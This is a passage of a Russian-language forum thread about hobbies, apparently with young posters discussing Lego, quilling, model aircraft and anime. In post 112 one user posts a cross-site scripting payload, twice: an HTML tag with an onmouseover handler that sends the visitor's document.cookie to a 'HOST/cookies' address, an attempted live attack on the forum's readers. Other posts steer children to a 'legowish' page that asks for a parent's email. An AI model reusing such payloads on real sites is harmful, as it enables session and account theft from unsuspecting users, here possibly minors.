Твои интересы и хобби
|
|
|
|
кай | Дата: Среда, 28.05.2014, 04:04 | Сообщение # 111 |
Гость
| Сублимирую.
|
|
| |
tomps | Дата: Пятница, 29.08.2014, 10:49 | Сообщение # 112 |
Гость
| <B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L L O </B> Добавлено (29.08.2014, 10:49) --------------------------------------------- <B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L L O </B>
|
|
| |
mattnichols | Дата: Воскресенье, 21.09.2014, 18:04 | Сообщение # 113 |
Гость
| Рок
Вы все лалки^^
|
|
| |
J_Di | Дата: Среда, 17.12.2014, 09:58 | Сообщение # 114 |
Гость
| Отметил в списке. А еще я увлекаюсь самолетиками. Хожу в авиамодельный кружок. Уже собрал несколько планеров. Хочу собрать большой самолет с моторчиком на радиоуправлении. Еще обожаю играть в лего. Хочу собрать все наборы про Звездные войны. У деда мороза в леговише попросил Имперский звездный разрушитель
|
|
| |
Раппунцель | Дата: Пятница, 19.12.2014, 18:43 | Сообщение # 115 |
Гость
| Цитата А еще я увлекаюсь самолетиками.
Круто А я квиллингом
Цитата Еще обожаю играть в лего.
Я лего тоже люблю
Цитата Хочу собрать все наборы про Звездные войны. У деда мороза в леговише попросил Имперский звездный разрушитель
Это как ты у Деда мороза попросил? А ты в него веришь кстати? Мне кажется его нет
|
|
| |
J_Di | Дата: Суббота, 20.12.2014, 09:15 | Сообщение # 116 |
Гость
| Очень просто. Есть такая страничка в интернете, называется legowish. По простому - список пожеланий к новому году. В виде письма Деду Морозу. Посмотри, там на самом деле все просто. И если по секрету, то я до сих пор в деда мороза верю. Хотя в школе по разному обсуждали. но я лично ни разу не видел как подарки под елкой появляются. Хотя уже года 4 меня спать в новый год не отправляют. Ребята из класса тоже такие письма отправили. даже те кто не верят и говорят, что подарки на новый год делают родители
А что такое квиллинг?
|
|
| |
Раппунцель | Дата: Суббота, 20.12.2014, 18:14 | Сообщение # 117 |
Гость
| Нашла этот леговский вишлист. Класс! Тоже письмо написала. Попросили указать адрес почты мамы или папы Посмотрим что получится Добавлено (20.12.2014, 18:14) --------------------------------------------- Ой, забыла про квиллинг написать. Это из бумажных ленточек всякую такую вот красоту можно делать К НГ делаю снежинки http://f2.mylove.ru/GcFhtDqS0whenW.jpg
|
|
| |
J_Di | Дата: Вторник, 23.12.2014, 09:53 | Сообщение # 118 |
Гость
| Цитата Нашла этот леговский вишлист. Класс! inverted
Вот я же говорил, что прикольная штука! )))
Цитата Посмотрим что получится biggrin
Не забудь написать!)))
Цитата Это из бумажных ленточек всякую такую вот красоту можно делать
Прикольно! )))
|
|
| |
SUPERDRY | Дата: Вторник, 24.03.2015, 13:14 | Сообщение # 119 |
Гость
| Я, Максим увлекаюсь аниме . Мне очень нравится их большие глаза и объемы . Вся моя комната увешена картинками Наруто
|
|
| |
Lesa | Дата: Воскресенье, 05.04.2015, 19:34 | Сообщение # 120 |
Гость
| Ребята,подскажите,как тут тему создать?
простоя
|
|
| |